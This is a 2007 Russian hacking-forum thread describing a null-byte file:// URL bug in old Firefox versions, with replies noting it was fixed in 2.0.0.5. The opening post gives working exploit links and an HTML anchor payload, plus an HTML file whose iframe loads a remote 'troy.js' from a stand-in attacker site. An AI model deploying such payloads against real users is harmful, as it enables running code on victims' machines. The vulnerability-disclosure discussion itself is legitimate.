Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Mozilla Firefox URLBar: выполнение произвольного кода. (https://forum.antichat.xyz/showthread.php?t=45156)

-=lebed=- 24.07.2007 10:30

Mozilla Firefox URLBar: выполнение произвольного кода.
 
Mozilla Firefox URLBar: выполнение произвольного кода.
автор: 0х00000000
www.0x000000.com/?i=333

Цель: Mozilla Firefox практически всех версий. <=2.0.0.4

Опасность: 4/10

Exploit:
В строке URL пишем:
Код:

file:///C:/winnt/system32/calc.exe%00.pdf
или в теле html-документа используем ссылку вида:
Код:

<A HREF=file:///C:/winnt/system32/calc.exe%00.pdf>download</A>
Общий вид эксплоита: [uri]/[filelocation]/[file][.ext1]%00[.ext2] - где между расширениями файла ext1 и ext2 вставлен терминирующий символ "%00" (нулевой байт - признак конца строки).

Подробности:
При открытии вредоносной ссылки Огненный Лис запутывается: он распознаёт этот файл как приложение (о чём честно пишет вверху) а ниже предлагает открыть этот файл как pdf-документ.
http://lebed.ucoz.ru/images/bug_ff.png
Если уязвимое приложение самостоятельно сопоставляет тип файла с обрабатывающем приложением, то при попытке открытия файла calc.exe%00.pdf запустится, например Acrobat Reader и попробует открыть файл calc.exe, что у него естественно не получиться и вместо захвата управления мы увидим сообщение Акробата о не верном формате файла. А вот если файл открывается API-функциями ShellExecute/ShellExecuteEx, то сопаставление типа и расширения ложиться на плечи операционной системы и она послушно запускает calc.exe.
Тут открываются возможности по выполнению произвольного javascript-сценария: например так:
Код:

file:///path/troy.txt%00.html
а файл troy.txt%00.html может содержать например такой html-код:
Код:

<html>
<iframe name="bla" src="http://www.you_site.com/hacks/?troy.js" width="100%" height="900"></iframe>
</html>

Защита: Внимательно смотрите на раширения файлов перед открытием.

ЗЫ: Другие уязвимости FF:
Цитата:

Найденные уязвимости позволяют удаленному злоумышленнику обойти ограничения безопасности, выполнить произвольный код, осуществить XSS атаку, произвести DoS атаку и атаку спуфинга.

1) Уязвимость возникает из-за множественных ошибок в движке браузера. Эксплуатирование уязвимости приведет к порче участков памяти и выполнению произвольного кода.
2) Уязвимость возникает из-за множественных ошибок в движке Javascript. Эксплуатирование уязвимости приведет к порче участков памяти и выполнению произвольного кода.
3) Уязвимость возникает из-за ошибки в методах "addEventListener" и "setTimeout". Эксплуатирование уязвимости приведет к обходу политик безопасности браузера и выполнению сценария в контексте другого сайта.
4) Уязвимость возникает из-за ошибки междоменной (cross-domain) обработки. Эксплуатирование уязвимости приведет к вставке произвольного сценария в sub-frame другого Web сайта.
5) Уязвимость возникает из-за ошибки в обработке элементов внешних документов. Атакующий может вызвать обработчик событий и выполнить произвольный код с привилегиями chrome.
6) Уязвимость возникает из-за ошибки в обработке "XPCNativeWrapper" Атакующий может выполнить произвольный код
за подробностями на bugtrack.ru

kot777 24.07.2007 10:52

Уязвима только 2.0.0.4, в 2.0.0.5 уже фикс.

Isis 24.07.2007 10:53

Мде...неплохо
Для каких версий фф?

c411k 24.07.2007 20:30

Цитата:

Сообщение от Isis
Мде...неплохо
Для каких версий фф?

мдя, ты только первых 5 слов прочитал в названии темы чтоли?
Цитата:

Уязвима только 2.0.0.4, в 2.0.0.5 уже фикс.

Isis 29.07.2007 09:54

c411k,
Цитата:

Последний раз редактировалось -=lebed=-, 24.07.2007 в 11:11.
Ниче так , да?

Zedobat 29.07.2007 11:48

Ну а что собственно удивляться. Вышла новая версия, и выкладывают дыры в старой. Так было и будет всегда, и не только для ФФ.


Время: 21:14